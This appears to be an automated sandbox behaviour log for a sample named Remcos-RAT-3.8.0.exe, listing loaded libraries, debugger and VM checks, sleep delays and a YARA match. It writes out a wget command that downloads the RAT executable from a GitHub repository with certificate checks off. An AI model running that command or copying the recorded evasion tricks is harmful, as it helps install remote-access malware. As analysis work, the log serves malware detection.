    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: System32.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: HPdn0C:\Windows\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1399643990.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Windows.Forms.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: mscorlib.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdbri source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb4 source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System32.pdb& source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: C:\Users\Gadr\source\repos\ConsoleApp5\ConsoleApp5\obj\x86\Debug\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.000000000624D000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000000.1335212870.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe.2.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Remcos-RAT-3.8.0.exe.2.drStatic PE information: 0xFB168D89 [Fri Jun 29 11:20:41 2103 UTC]
    Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeJump to dropped file
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599871Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599750Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599442Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598969Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598798Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598672Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 595841Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 595715Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeWindow / User API: threadDelayed 451Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeWindow / User API: threadDelayed 755Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -600000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8540Thread sleep count: 451 > 30Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -599871s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -599750s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -599442s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -598969s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -598798s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8540Thread sleep count: 755 > 30Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -598672s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -598563s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -595841s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536Thread sleep time: -595715s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599871Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599750Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599442Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598969Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598798Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598672Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 595841Jump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 595715Jump to behavior
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAMX
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: Remcos-RAT-3.8.0.exe PID: 8472, type: MEMORYSTR
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://github.com/ox47100/remcos-rat-v3.8.0/raw/refs/heads/main/remcos-rat-3.8.0.exe" > cmdline.out 2>&1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://github.com/ox47100/remcos-rat-v3.8.0/raw/refs/heads/main/remcos-rat-3.8.0.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://github.com/ox47100/remcos-rat-v3.8.0/raw/refs/heads/main/remcos-rat-3.8.0.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeQueries volume information: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
